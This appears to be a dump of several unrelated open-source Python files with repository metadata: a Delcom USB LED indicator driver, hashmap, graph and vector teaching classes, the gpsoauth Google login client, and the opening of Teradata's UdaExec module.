# indicators.
#
# Requires the Signal 11 HIDAPI and cython-hidapi.
#
# Copyright (c) 2019 Aaron Linville <aaron@linville.org>
import hid
# USB identifiers used to locate Delcom 904x devices via hidapi.
vendor_id = 0x0FC5
product_id = 0xB080
# Bit flags for the three LED channels; OR them together to mix colors.
green = 1
red = 2
blue = 4
def list():
    """Lists all the Delcom USBLMP 904x devices"""
    # One paragraph of key/value pairs per attached device, keys sorted
    # for stable output, separated by a blank line.
    for device_info in hid.enumerate(vendor_id, product_id):
        for field in sorted(device_info.keys()):
            print(f"{field} : {device_info[field]}")
        print()
class DelcomMultiColorIndicator:
    """A python class for the Delcom USBLMP 904x Multi-color Visual Signal Indicators.

    All device interaction goes through HID write/feature-report packets;
    the write sequences below are order-sensitive.
    """
    # Command Packet Format:
    # Byte 0 - Major Command
    # Byte 1 - Minor Command
    # Byte 2 - Data LSB
    # Byte 3 - Data MSB
    # Bytes 4-8 - Data HID
    # Bytes 8-16 - Data External (Optional)
    def __init__(self):
        """Constructs and attempts to attach to any available Delcom 904x Multi-Color
        Visual Indicator."""
        try:
            self.h = hid.device()
            self.h.open(vendor_id, product_id)  # Vendor Id, Product Id
            # Start from a known state: all LEDs and the buzzer off.
            self.reset()
        except OSError as e:
            # hidapi raises OSError when no matching device can be opened.
            print(f"Failed: {e}")
            raise
    def info(self):
        """Prints out all the USB, firmware and current configuration
        on the attached multi-color indicator."""
        print(f"USB Manufacturer Id: {self.h.get_manufacturer_string()}")
        print(f"USB Product Id: {self.h.get_product_string()}")
        print(f"USB Serial Id: {self.h.get_serial_number_string()}")
        # Feature report 10: serial number and firmware details.
        data = self.h.get_feature_report(10, 8)
        # NOTE(review): the shift amounts (32/16/8) leave gaps between the
        # four serial bytes; a contiguous big-endian decode would be
        # 24/16/8 — confirm against the Delcom datasheet.
        print("Serial: %s" % (data[3] << 32 | data[2] << 16 | data[1] << 8 | data[0]))
        print(f"Firmware version: {data[5]}")
        # NOTE(review): data[5] is printed both as the version above and as
        # the day field here — confirm the intended byte layout.
        print(f"Firmware date: {data[7] + 2000}, {data[6]}, {data[5]}")
        # Feature report 100: current port states.
        data = self.h.get_feature_report(100, 4)
        print("Port 0:", data[0])
        print("Port 1:", data[1])
        # Port 1 bits appear active-low: a cleared bit means the color is
        # enabled, hence the ~data[1] tests below.
        str = []  # NOTE(review): shadows the builtin str inside this method
        if ~data[1] & green:
            str.append("Green")
        if ~data[1] & red:
            str.append("Red")
        if ~data[1] & blue:
            str.append("Blue/Yellow")
        if data[1] == 255:
            str.append("None")
        print(f" Enabled colors: {','.join(str)}")
        print("Port 1 Clock Enable Status:", data[2])
        print("Port 2:", data[3])
    def reset(self):
        """Turns off all the LEDs and Buzzers."""
        self.set_color(0)
        self.disable_buzzer()
    def set_color(self, colors, flashing=False, cycle_time=0):
        """Enables the colors with optional flashing or color cycling.

        colors is a bitwise OR of the module-level green/red/blue flags;
        cycle_time > 0 rotates through the selected colors one at a time.
        """
        self.h.write([101, 12, colors, 0xFF])
        # Enable flashing on the selected pins; otherwise make sure any
        # previously-enabled flash mode is turned off.
        if flashing or cycle_time > 0:
            self.h.write([101, 20, ~colors & 0xFF, colors])
        else:
            self.h.write([101, 20, 0xF, 0x0])
        if cycle_time > 0:
            # Syncronize clock generation
            delay = 0
            # Each color stays off while the other selected colors take
            # their turn, so off = (count-1) * cycle_time.
            off_time = bin(colors).count("1") * cycle_time - cycle_time
            if colors & green:
                # print(f"Cycle green: {cycle_time}, {delay}, {off_time}")
                self.__set_duty_cycle(0, cycle_time, off_time)
                self.__set_phase_delay(0, delay)
                delay += cycle_time
            if colors & red:
                # print(f"Cycle red: {cycle_time}, {delay}, {off_time}")
                self.__set_duty_cycle(1, cycle_time, off_time)
                self.__set_phase_delay(1, delay)
                delay += cycle_time
            if colors & blue:
                # print(f"Cycle blue: {cycle_time}, {delay}, {off_time}")
                self.__set_duty_cycle(2, cycle_time, off_time)
                self.__set_phase_delay(2, delay)
                delay += cycle_time
            self.h.write(
                [101, 25, colors, 0]  # Selected on pins
            )  # No initial phase delay
        else:
            self.h.write([101, 25, 0xF, 0])  # All pins # No initial phase delay
    def __set_duty_cycle(self, color_pin, on_time, off_time):
        """Internal method to set the duty cycle on a pin, used for color cycling."""
        self.h.write(
            [
                101,
                21 + color_pin,  # Pin to set duty cycle on
                off_time,  # High duty cycle
                on_time,
            ]
        )  # Low duty cycle
    def __set_phase_delay(self, color_pin, delay_time):
        """Internal method to set the initial delay on a pin, used for color cycling."""
        self.h.write(
            [
                101,
                26 + color_pin,  # Pin to delay turning on
                delay_time,  # High duty cycle
                0x0,
            ]
        )
    def set_intensity(self, intensity, colors):
        """Sets the intensity of a color using pulse-width modulation (0-100 %)."""
        self.h.write([101, 34, colors, intensity])
    def disable_buzzer(self):
        """Disables the buzzer."""
        self.h.write(
            [
                102,
                70,
                0x0,  # Disable Buzzer
                0x0,  # Frequency
                0x0,
                0x0,
                0x0,
                0x0,
                0,
                0,  # Duty cycle (on), 50 ms units
                0,  # Duty cycle (off), 50 ms units
                0x0,
                0x0,
                0x0,
                0x0,
                0x0,
            ]
        )
    def enable_buzzer(self, freq, duty_on, duty_off, repeat):
        """Enables the buzzer with a duty cycle and repetition. Frequency is currently
        hardcoded."""
        # NOTE(review): the freq parameter is ignored — the frequency byte
        # below is hardcoded to 0x4.
        self.h.write(
            [
                102,
                70,
                0x1,  # Enable Buzzer
                0x4,  # Frequency
                0x0,
                0x0,
                0x0,
                0x0,
                repeat,
                int(duty_on / 50),  # Duty cycle (on), 50 ms units
                int(duty_off / 50),  # Duty cycle (off), 50 ms units
                0x0,
                0x0,
                0x0,
                0x0,
                0x0,
            ]
        )
| {
"repo_name": "linville/delcom904x",
"path": "delcom904x.py",
"copies": "1",
"size": "6254",
"license": "isc",
"hash": 2960943801907454000,
"line_mean": 29.6568627451,
"line_max": 89,
"alpha_frac": 0.493284298,
"autogenerated": false,
"ratio": 3.642399534071054,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9633126989504862,
"avg_score": 0.0005113685132383886,
"num_lines": 204
} |
"""A python class library for creating something called a hash map that
is capable of storing name value pairs in a data structure that is
efficient to retrieve values based on provided names.
This rendition only allows a single value for each name.
"""
# This first function is an initializer
def new(num_buckets=256):
    """Initializes a Map with the given number of buckets. Default = 256 buckets"""
    # A map is just a list of num_buckets independent empty bucket lists:
    # [[], [], [], ...]
    return [[] for _ in range(num_buckets)]
def hash_key(aMap, key):
    """Given a key, this will create a number and then convert it to an index for the aMap's buckets."""
    # hash() can produce a huge (or negative) integer; reducing it modulo
    # the bucket count maps any key onto a valid index, so large hashes
    # still distribute over a small number of buckets.
    bucket_count = len(aMap)
    return hash(key) % bucket_count
def get_bucket(aMap, key):
    """Given a key, find the bucket where it would go."""
    # Hash the key to an index, then return that bucket list directly.
    return aMap[hash_key(aMap, key)]
def get_slot(aMap, key, default=None):
    """
    Returns the index, key, and a value of a slot found in a bucket.
    Returns -1, key, and default (None if not set) when not found.
    """
    # Only the one bucket this key hashes to can contain it; each entry
    # in a bucket is a (key, value) tuple, so a linear scan suffices.
    for index, (slot_key, slot_value) in enumerate(get_bucket(aMap, key)):
        if slot_key == key:
            return index, slot_key, slot_value
    # The key was not present anywhere in its bucket.
    return -1, key, default
def get(aMap, key, default=None):
    """Gets the value in a bucket for the given key, or the default."""
    _, _, value = get_slot(aMap, key, default=default)
    return value
def set(aMap, key, value):
    """Sets the key to the value, replacing any existing value."""
    bucket = get_bucket(aMap, key)
    slot_index, _, _ = get_slot(aMap, key)
    if slot_index < 0:
        # New key: append a fresh (key, value) pair to its bucket.
        bucket.append((key, value))
    else:
        # Existing key: overwrite the pair in place.
        bucket[slot_index] = (key, value)
def delete(aMap, key):
    """Deletes the given key from the Map. No-op if the key is absent."""
    bucket = get_bucket(aMap, key)
    # Fix: xrange() is Python-2-only; enumerate() behaves identically on
    # Python 2 and works on Python 3. Deleting then breaking immediately
    # keeps the in-place mutation safe.
    for i, (k, v) in enumerate(bucket):
        if key == k:
            del bucket[i]
            break
def list(aMap):
"""Prints out what's in the Map."""
for bucket in aMap:
if bucket:
for k, v in bucket:
print k, v
| {
"repo_name": "jessehagberg/python-playground",
"path": "hashmap.py",
"copies": "1",
"size": "2724",
"license": "cc0-1.0",
"hash": 904727997097923800,
"line_mean": 29.3333333333,
"line_max": 105,
"alpha_frac": 0.6600587372,
"autogenerated": false,
"ratio": 3.2819277108433735,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.44419864480433735,
"avg_score": null,
"num_lines": null
} |
""" A Python Class
A simple Python graph class, demonstrating the essential
facts and functionalities of graphs.
"""
class Graph(object):
def __init__(self, graph_dict={}):
""" initializes a graph object """
self.__graph_dict = graph_dict
def vertices(self):
""" returns the vertices of a graph """
return list(self.__graph_dict.keys())
def edges(self):
""" returns the edges of a graph """
return self.__generate_edges()
def add_vertex(self, vertex):
""" If the vertex "vertex" is not in
self.__graph_dict, a key "vertex" with an empty
list as a value is added to the dictionary.
Otherwise nothing has to be done.
"""
if vertex not in self.__graph_dict:
self.__graph_dict[vertex] = []
def add_edge(self, edge):
""" assumes that edge is of type set, tuple or list;
between two vertices can be multiple edges!
"""
edge = set(edge)
vertex1 = edge.pop()
if edge:
# not a loop
vertex2 = edge.pop()
else:
# a loop
vertex2 = vertex1
if vertex1 in self.__graph_dict:
self.__graph_dict[vertex1].append(vertex2)
else:
self.__graph_dict[vertex1] = [vertex2]
def __generate_edges(self):
""" A static method generating the edges of the
graph "graph". Edges are represented as sets
with one (a loop back to the vertex) or two
vertices
"""
edges = []
for vertex in self.__graph_dict:
for neighbour in self.__graph_dict[vertex]:
if {neighbour, vertex} not in edges:
edges.append({vertex, neighbour})
return edges
def __str__(self):
res = "vertices: "
for k in self.__graph_dict:
res += str(k) + " "
res += "\nedges: "
for edge in self.__generate_edges():
res += str(edge) + " "
return res
def find_isolated_vertices(self):
""" returns a list of isolated vertices. """
graph = self.__graph_dict
isolated = []
for vertex in graph:
print(isolated, vertex)
if not graph[vertex]:
isolated += [vertex]
return isolated
def find_path(self, start_vertex, end_vertex, path=[]):
""" find a path from start_vertex to end_vertex
in graph """
graph = self.__graph_dict
path = path + [start_vertex]
if start_vertex == end_vertex:
return path
if start_vertex not in graph:
return None
for vertex in graph[start_vertex]:
if vertex not in path:
extended_path = self.find_path(vertex,
end_vertex,
path)
if extended_path:
return extended_path
return None
def find_all_paths(self, start_vertex, end_vertex, path=[]):
""" find all paths from start_vertex to
end_vertex in graph """
graph = self.__graph_dict
path = path + [start_vertex]
if start_vertex == end_vertex:
return [path]
if start_vertex not in graph:
return []
paths = []
for vertex in graph[start_vertex]:
if vertex not in path:
extended_paths = self.find_all_paths(vertex,
end_vertex,
path)
for p in extended_paths:
paths.append(p)
return paths
def is_connected(self,
vertices_encountered = set(),
start_vertex=None):
""" determines if the graph is connected """
gdict = self.__graph_dict
vertices = gdict.keys()
if not start_vertex:
# chosse a vertex from graph as a starting point
start_vertex = vertices[0]
vertices_encountered.add(start_vertex)
if len(vertices_encountered) != len(vertices):
for vertex in gdict[start_vertex]:
if vertex not in vertices_encountered:
if self.is_connected(vertices_encountered, vertex):
return True
else:
return True
return False
def vertex_degree(self, vertex):
""" The degree of a vertex is the number of edges connecting
it, i.e. the number of adjacent vertices. Loops are counted
double, i.e. every occurence of vertex in the list
of adjacent vertices. """
adj_vertices = self.__graph_dict[vertex]
degree = len(adj_vertices) + adj_vertices.count(vertex)
return degree
def degree_sequence(self):
""" calculates the degree sequence """
seq = []
for vertex in self.__graph_dict:
seq.append(self.vertex_degree(vertex))
seq.sort(reverse=True)
return tuple(seq)
@staticmethod
def is_degree_sequence(sequence):
""" Method returns True, if the sequence "sequence" is a
degree sequence, i.e. a non-increasing sequence.
Otherwise False is returned.
"""
# check if the sequence sequence is non-increasing:
return all( x>=y for x, y in zip(sequence, sequence[1:]))
def delta(self):
""" the minimum degree of the vertices """
min = 100000000
for vertex in self.__graph_dict:
vertex_degree = self.vertex_degree(vertex)
if vertex_degree < min:
min = vertex_degree
return min
def Delta(self):
""" the maximum degree of the vertices """
max = 0
for vertex in self.__graph_dict:
vertex_degree = self.vertex_degree(vertex)
if vertex_degree > max:
max = vertex_degree
return max
def density(self):
""" method to calculate the density of a graph """
g = self.__graph_dict
V = len(g.keys())
E = len(self.edges())
return 2.0 * E / (V *(V - 1))
def diameter(self):
""" calculates the diameter of the graph """
v = self.vertices()
pairs = [ (v[i],v[j]) for i in range(len(v)) for j in range(i+1, len(v)-1)]
smallest_paths = []
for (s,e) in pairs:
paths = self.find_all_paths(s,e)
smallest = sorted(paths, key=len)[0]
smallest_paths.append(smallest)
smallest_paths.sort(key=len)
# longest path is at the end of list,
# i.e. diameter corresponds to the length of this path
diameter = len(smallest_paths[-1])
return diameter
@staticmethod
def erdoes_gallai(dsequence):
""" Checks if the condition of the Erdoes-Gallai inequality
is fullfilled
"""
if sum(dsequence) % 2:
# sum of sequence is odd
return False
if Graph.is_degree_sequence(dsequence):
for k in range(1,len(dsequence) + 1):
left = sum(dsequence[:k])
right = k * (k-1) + sum([min(x,k) for x in dsequence[k:]])
if left > right:
return False
else:
# sequence is increasing
return False
return True
if __name__ == "__main__":
    # Demonstration script: builds a small graph (with a loop at "c" and
    # the isolated vertex "f") and exercises the Graph API end to end.
    g = { "a" : ["d"],
          "b" : ["c"],
          "c" : ["b", "c", "d", "e"],
          "d" : ["a", "c"],
          "e" : ["c"],
          "f" : []
        }
    graph = Graph(g)
    print(graph)
    for node in graph.vertices():
        print(graph.vertex_degree(node))
    print("List of isolated vertices:")
    print(graph.find_isolated_vertices())
    print("""A path from "a" to "e":""")
    print(graph.find_path("a", "e"))
    print("""All pathes from "a" to "e":""")
    print(graph.find_all_paths("a", "e"))
    print("The maximum degree of the graph is:")
    print(graph.Delta())
    print("The minimum degree of the graph is:")
    print(graph.delta())
    print("Edges:")
    print(graph.edges())
    print("Degree Sequence: ")
    ds = graph.degree_sequence()
    print(ds)
    # Example degree sequences that do / do not satisfy Erdoes-Gallai.
    fullfilling = [ [2, 2, 2, 2, 1, 1],
                    [3, 3, 3, 3, 3, 3],
                    [3, 3, 2, 1, 1]
                  ]
    non_fullfilling = [ [4, 3, 2, 2, 2, 1, 1],
                        [6, 6, 5, 4, 4, 2, 1],
                        [3, 3, 3, 1] ]
    for sequence in fullfilling + non_fullfilling :
        print(sequence, Graph.erdoes_gallai(sequence))
    print("Add vertex 'z':")
    graph.add_vertex("z")
    print(graph)
    print("Add edge ('x','y'): ")
    graph.add_edge(('x', 'y'))
    print(graph)
    print("Add edge ('a','d'): ")
    graph.add_edge(('a', 'd'))
    print(graph)
| {
"repo_name": "ivannz/study_notes",
"path": "year_14_15/fall_2014/programming/graph2.py",
"copies": "1",
"size": "9074",
"license": "mit",
"hash": -5428572147049922000,
"line_mean": 30.6167247387,
"line_max": 83,
"alpha_frac": 0.5076041437,
"autogenerated": false,
"ratio": 4.164295548416705,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5171899692116705,
"avg_score": null,
"num_lines": null
} |
""" A python class to represent vectors """
import math
class Vector(object):
    """ A python class to represent n-dimensional vectors.

    Supports +, -, scalar multiplication and dot product (both via *),
    magnitude, normalization and simple geometric predicates.
    """

    def __init__(self, coordinates, tolerance=1e-10):
        """coordinates: iterable of numbers; tolerance: threshold used
        for the zero-vector and orthogonality float comparisons."""
        self.coordinates = tuple(coordinates)
        # Measure the stored tuple so generator inputs are handled too
        # (len() on a consumed generator would fail).
        self.dimension = len(self.coordinates)
        self.tolerance = tolerance

    def __str__(self):
        return "{}".format(self.coordinates)

    def __eq__(self, v):
        return self.coordinates == v.coordinates

    def __add__(self, v):
        """Component-wise sum; raises ValueError on dimension mismatch."""
        if self.dimension != v.dimension:
            raise ValueError("Vector dimensions must be the same")
        return Vector([a + b for a, b in zip(self.coordinates, v.coordinates)])

    def __sub__(self, v):
        """Component-wise difference; raises ValueError on dimension mismatch."""
        if self.dimension != v.dimension:
            raise ValueError("Vector dimensions must be the same")
        return Vector([a - b for a, b in zip(self.coordinates, v.coordinates)])

    def __mul__(self, other):
        """Dot product when other is a Vector, else scalar multiplication.

        Cleanup: removed two unused magnitude computations from the dot
        product branch.
        """
        if type(other) is Vector:
            return sum(x * y for x, y in zip(self.coordinates, other.coordinates))
        return Vector([x * other for x in self.coordinates])

    def getMagnitude(self):
        """ Returns the magnitude (length) of the given Vector """
        return math.sqrt(sum(x ** 2 for x in self.coordinates))

    def getNormalization(self):
        """ Returns the unit vector representation of the given Vector.

        Bug fix: the zero-vector branch raised NameError because it used
        lowercase ``exception``; it now raises a proper Exception.
        """
        try:
            return self * (1 / self.getMagnitude())
        except ZeroDivisionError:
            raise Exception("Cannot normalize the zero vector")

    def isZero(self):
        """True when the magnitude is below the configured tolerance."""
        return self.getMagnitude() < self.tolerance

    def angleDiff(self, other, units="rad"):
        """ Returns the angle between two vectors ("rad" or degrees). """
        rads = math.acos((self * other) / (self.getMagnitude() * other.getMagnitude()))
        return rads if units == "rad" else math.degrees(rads)

    def orthogonalTo(self, other):
        """ Returns true of the vectors are orthogonal to each other """
        return abs(self * other) < self.tolerance

    def parallelTo(self, other):
        """ Returns true if the vectors are parallel to each other.

        NOTE(review): the 0/180-degree comparisons are exact float
        equality, so nearly-parallel vectors may return False.
        """
        return (self.isZero() or other.isZero() or
                self.angleDiff(other, "deg") == 0 or
                self.angleDiff(other, "deg") == 180)
if __name__ == "__main__":
    # Quick demonstration of the Vector operations on two 3-D vectors.
    myVec1 = Vector([1,2,3])
    myVec2 = Vector([-2,0,5])
    print("Vec1 {}".format(myVec1))
    print("Vec2 {}".format(myVec2))
    print("Vec1 + Vec2 = {}".format(myVec1 + myVec2))
    print("Vec1 - Vec2 = {}".format(myVec1 - myVec2))
    print("Vec1 * 2 = {}".format(myVec1 * 2))
    print("Vec1 * Vec2 = {}".format(myVec1 * myVec2))
    print("Vec1 Magnitude = {}".format(myVec1.getMagnitude()))
    print("Vec2 Normalized = {}".format(myVec2.getNormalization()))
| {
"repo_name": "certifiedloud/linalg",
"path": "stumpy.py",
"copies": "1",
"size": "3259",
"license": "mit",
"hash": 1164223916371088000,
"line_mean": 35.2111111111,
"line_max": 87,
"alpha_frac": 0.5900583001,
"autogenerated": false,
"ratio": 3.9217809867629363,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9996744471432871,
"avg_score": 0.0030189630860128947,
"num_lines": 90
} |
"""A python client interface for ProofAssistantService."""
from __future__ import absolute_import
from __future__ import division
# Import Type Annotations
from __future__ import print_function
import grpc
import tensorflow as tf
from deepmath.proof_assistant import proof_assistant_pb2
from deepmath.proof_assistant import proof_assistant_pb2_grpc
# Command-line flag locating the proof assistant gRPC server.
tf.flags.DEFINE_string(
    'proof_assistant_server_address', 'localhost:2000',
    'address (including port) of the proof assistant server')
FLAGS = tf.flags.FLAGS
# gRPC send/receive message sizes are both capped at 1 GiB via the
# channel options set in ProofAssistant.__init__.
GIGABYTE = 1024 * 1024 * 1024
GRPC_MAX_MESSAGE_LENGTH = GIGABYTE
class ProofAssistant(object):
    """Thin gRPC client wrapper around the ProofAssistantService stub."""

    def __init__(self):
        # Raise the default gRPC message-size limits to 1 GiB each way.
        channel_options = [
            ('grpc.max_send_message_length', GRPC_MAX_MESSAGE_LENGTH),
            ('grpc.max_receive_message_length', GRPC_MAX_MESSAGE_LENGTH),
        ]
        self.channel = grpc.insecure_channel(
            FLAGS.proof_assistant_server_address, options=channel_options)
        self.stub = proof_assistant_pb2_grpc.ProofAssistantServiceStub(
            self.channel)

    def ApplyTactic(self, request: proof_assistant_pb2.ApplyTacticRequest
                    ) -> proof_assistant_pb2.ApplyTacticResponse:
        """Forward an ApplyTactic RPC to the server."""
        return self.stub.ApplyTactic(request)

    def VerifyProof(self, request: proof_assistant_pb2.VerifyProofRequest
                    ) -> proof_assistant_pb2.VerifyProofResponse:
        """Forward a VerifyProof RPC to the server."""
        return self.stub.VerifyProof(request)

    def RegisterTheorem(self, request: proof_assistant_pb2.RegisterTheoremRequest
                        ) -> proof_assistant_pb2.RegisterTheoremResponse:
        """Forward a RegisterTheorem RPC to the server."""
        return self.stub.RegisterTheorem(request)
| {
"repo_name": "tensorflow/deepmath",
"path": "deepmath/deephol/public/proof_assistant.py",
"copies": "1",
"size": "1565",
"license": "apache-2.0",
"hash": -7398573641677141000,
"line_mean": 36.2619047619,
"line_max": 80,
"alpha_frac": 0.731629393,
"autogenerated": false,
"ratio": 3.5568181818181817,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9768835446917433,
"avg_score": 0.003922425580149703,
"num_lines": 42
} |
"""A python client library for Google Play Services OAuth."""
from __future__ import annotations
from collections.abc import MutableMapping
from importlib.metadata import version
import ssl
from typing import Any, Iterable
import requests
from urllib3.poolmanager import PoolManager # type: ignore
from . import google
__version__ = version(__package__)

# The key is distributed with Google Play Services.
# This one is from version 7.3.29.
B64_KEY_7_3_29 = (
    b"AAAAgMom/1a/v0lblO2Ubrt60J2gcuXSljGFQXgcyZWveWLEwo6prwgi3"
    b"iJIZdodyhKZQrNWp5nKJ3srRXcUW+F1BD3baEVGcmEgqaLZUNBjm057pK"
    b"RI16kB0YppeGx5qIQ5QjKzsR8ETQbKLNWgRY0QRNVz34kMJR3P/LgHax/"
    b"6rmf5AAAAAwEAAQ=="
)
# Parsed key object passed to google.construct_signature() when building
# the EncryptedPasswd field of the login request.
ANDROID_KEY_7_3_29 = google.key_from_b64(B64_KEY_7_3_29)

AUTH_URL = "https://android.clients.google.com/auth"
USER_AGENT = "gpsoauth/" + __version__

# Google is very picky about list of used ciphers. Changing this list most likely
# will cause BadAuthentication error.
CIPHERS = [
    "ECDHE+AESGCM",
    "ECDHE+CHACHA20",
    "DHE+AESGCM",
    "DHE+CHACHA20",
    "ECDH+AES",
    "DH+AES",
    "RSA+AESGCM",
    "RSA+AES",
    "!aNULL",
    "!eNULL",
    "!MD5",
    "!DSS",
]
class SSLContext(ssl.SSLContext):
    """SSLContext wrapper that suppresses ALPN negotiation."""

    def set_alpn_protocols(self, alpn_protocols: Iterable[str]) -> None:
        """
        Intentionally a no-op: ALPN headers cause Google to return
        403 Bad Authentication, so this override prevents the protocols
        from ever being advertised during the TLS handshake.
        """
class AuthHTTPAdapter(requests.adapters.HTTPAdapter):
    """HTTPAdapter wrapper that installs a Google-compatible SSLContext."""

    def init_poolmanager(self, *args: Any, **kwargs: Any) -> None:
        """
        Secure settings from ssl.create_default_context(), but without
        ssl.OP_NO_TICKET which causes Google to return 403 Bad
        Authentication.
        """
        # Use the ALPN-suppressing SSLContext subclass rather than a
        # default context.
        context = SSLContext()
        # Restrict the handshake to the cipher list Google accepts.
        context.set_ciphers(":".join(CIPHERS))
        context.options |= ssl.OP_NO_COMPRESSION
        # Disable the legacy SSL protocol versions.
        context.options |= ssl.OP_NO_SSLv2
        context.options |= ssl.OP_NO_SSLv3
        context.post_handshake_auth = True
        # Still verify the server certificate despite the custom context.
        context.verify_mode = ssl.CERT_REQUIRED
        self.poolmanager = PoolManager(*args, ssl_context=context, **kwargs)
def _perform_auth_request(
    data: dict[str, int | str | bytes], proxies: MutableMapping[str, str] | None = None
) -> dict[str, str]:
    """POST ``data`` to the Google auth endpoint and parse the reply."""
    session = requests.session()
    # Mount the hardened adapter so the TLS handshake matches what
    # Google's endpoint expects.
    session.mount(AUTH_URL, AuthHTTPAdapter())
    if proxies:
        session.proxies = proxies
    response = session.post(AUTH_URL, data, headers={"User-Agent": USER_AGENT})
    return google.parse_auth_response(response.text)
def perform_master_login(
    email: str,
    password: str,
    android_id: str,
    service: str = "ac2dm",
    device_country: str = "us",
    operator_country: str = "us",
    lang: str = "en",
    sdk_version: int = 17,
    proxy: MutableMapping[str, str] | None = None,
) -> dict[str, str]:
    """
    Perform a master login, which is what Android does when you first add
    a Google account.

    The password is not sent verbatim: it is passed through
    google.construct_signature() with the bundled Play Services key and
    sent as the EncryptedPasswd form field. ``proxy`` is an optional
    requests-style proxy mapping.

    Return a dict, eg::

        {
            'Auth': '...',
            'Email': 'email@gmail.com',
            'GooglePlusUpgrade': '1',
            'LSID': '...',
            'PicasaUser': 'My Name',
            'RopRevision': '1',
            'RopText': ' ',
            'SID': '...',
            'Token': 'oauth2rt_1/...',
            'firstName': 'My',
            'lastName': 'Name',
            'services': 'hist,mail,googleme,...'
        }
    """
    data: dict[str, int | str | bytes] = {
        "accountType": "HOSTED_OR_GOOGLE",
        "Email": email,
        "has_permission": 1,
        "add_account": 1,
        "EncryptedPasswd": google.construct_signature(
            email, password, ANDROID_KEY_7_3_29
        ),
        "service": service,
        "source": "android",
        "androidId": android_id,
        "device_country": device_country,
        "operatorCountry": operator_country,
        "lang": lang,
        "sdk_version": sdk_version,
    }
    return _perform_auth_request(data, proxy)
def perform_oauth(
    email: str,
    master_token: str,
    android_id: str,
    service: str,
    app: str,
    client_sig: str,
    device_country: str = "us",
    operator_country: str = "us",
    lang: str = "en",
    sdk_version: int = 17,
    proxy: MutableMapping[str, str] | None = None,
) -> dict[str, str]:
    """
    Use a master token from master_login to perform OAuth to a specific Google service.

    The master token is sent as the EncryptedPasswd field in place of
    credentials; ``proxy`` is an optional requests-style proxy mapping.

    Return a dict, eg::

        {
            'Auth': '...',
            'LSID': '...',
            'SID': '..',
            'issueAdvice': 'auto',
            'services': 'hist,mail,googleme,...'
        }

    To authenticate requests to this service, include a header
    ``Authorization: GoogleLogin auth=res['Auth']``.
    """
    data: dict[str, int | str | bytes] = {
        "accountType": "HOSTED_OR_GOOGLE",
        "Email": email,
        "has_permission": 1,
        "EncryptedPasswd": master_token,
        "service": service,
        "source": "android",
        "androidId": android_id,
        "app": app,
        "client_sig": client_sig,
        "device_country": device_country,
        "operatorCountry": operator_country,
        "lang": lang,
        "sdk_version": sdk_version,
    }
    return _perform_auth_request(data, proxy)
| {
"repo_name": "simon-weber/gpsoauth",
"path": "gpsoauth/__init__.py",
"copies": "1",
"size": "5217",
"license": "mit",
"hash": -7823423472072371000,
"line_mean": 26.75,
"line_max": 87,
"alpha_frac": 0.5915276979,
"autogenerated": false,
"ratio": 3.416502946954813,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4508030644854813,
"avg_score": null,
"num_lines": null
} |
""" A Python Database API Specification v2.0 implementation that provides
configuration loading, variable substitution, logging, query banding,
etc and options to use either ODBC or REST"""
# The MIT License (MIT)
#
# Copyright (c) 2015 by Teradata
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import string
import os.path
import logging
import time
import atexit
import datetime
import platform
import getpass
import subprocess
import collections
import codecs
from .util import toUnicode
from . import tdodbc, util, api, datatypes
from . import tdrest # @UnresolvedImport
from .version import __version__ # @UnresolvedImport
# The module logger
logger = logging.getLogger(__name__)

# Connection methods accepted by UdaExec.connect() ("method" parameter).
METHOD_REST = "rest"
METHOD_ODBC = "odbc"

# Implement python version specific setup.
if sys.version_info[0] == 2:
    import ConfigParser as configparser  # @UnresolvedImport #@UnusedImport
else:
    import configparser  # @UnresolvedImport @UnusedImport @Reimport
def handleUncaughtException(exc_type, exc_value, exc_traceback):
    """Make sure that uncaught exceptions are logged"""
    exc_info = (exc_type, exc_value, exc_traceback)
    logger.error("Uncaught exception", exc_info=exc_info)
    # Delegate to the default hook so the traceback still reaches stderr.
    sys.__excepthook__(exc_type, exc_value, exc_traceback)
def exiting():
    """Invoked when the python interpreter is exiting."""
    # Registered via atexit in UdaExec.__init__ so shutdown shows in logs.
    logger.info("UdaExec exiting.")
class UdaExec:
"""Helper class for scripting with Teradata systems"""
def __init__(self, appName="${appName}", version="${version}",
             checkpointFile="${checkpointFile}",
             runNumberFile="${runNumberFile}", runNumber=None,
             configureLogging="${configureLogging}", logDir="${logDir}",
             logFile="${logFile}", logConsole="${logConsole}",
             logLevel="${logLevel}", logRetention="${logRetention}",
             systemConfigFile="/etc/udaexec.ini",
             userConfigFile="~/udaexec.ini", appConfigFile="udaexec.ini",
             configFiles=None, configSection="CONFIG",
             configEncoding="utf8", parseCmdLineArgs=True,
             gitPath="${gitPath}", production="${production}",
             odbcLibPath="${odbcLibPath}",
             dataTypeConverter=datatypes.DefaultDataTypeConverter()):
    """ Initializes the UdaExec framework.

    Most defaults are "${...}" placeholders resolved against the loaded
    configuration files; appName is required (as a parameter or in a
    config file). NOTE(review): the dataTypeConverter default is
    evaluated once at definition time and therefore shared by every
    UdaExec instance — confirm that is intentional.
    """
    # Load configuration files.
    if configFiles is None:
        configFiles = []
        _appendConfigFiles(
            configFiles, systemConfigFile, userConfigFile, appConfigFile)
    # Messages raised before logging is configured are buffered here.
